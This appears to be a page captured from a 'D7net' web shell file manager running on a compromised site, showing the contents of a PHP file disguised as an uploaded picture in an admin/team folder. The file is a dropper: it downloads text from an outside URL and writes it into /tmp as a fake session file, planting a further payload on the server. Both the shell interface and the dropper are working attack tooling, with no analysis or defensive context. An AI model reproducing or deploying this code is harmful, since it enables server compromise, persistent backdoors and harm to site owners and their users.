D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
u166148318
/
domains
/
avrd.org
/
public_html
/
admin
/
team
/
Filename :
pic68c0389c7b6369.89964908.php
back
Copy
<?php if (is_dir("/tmp")) { $file = "/tmp/sess_" . md5 ("naxtarrr") . ".php"; if (!file_exists($file)) { $content = file_get_contents("https://www.fcalpha.net/web/photo/20151024/m.txt"); if ($content !== false) { $fp = fopen($file, "w"); if ($fp) { fwrite($fp, $content); fclose($fp); echo "File created successfully."; } else { echo "Error opening file for writing."; } } else { echo "Error fetching file."; } } else { echo "File already exists."; } } else { echo "Temporary directory does not exist."; } ?>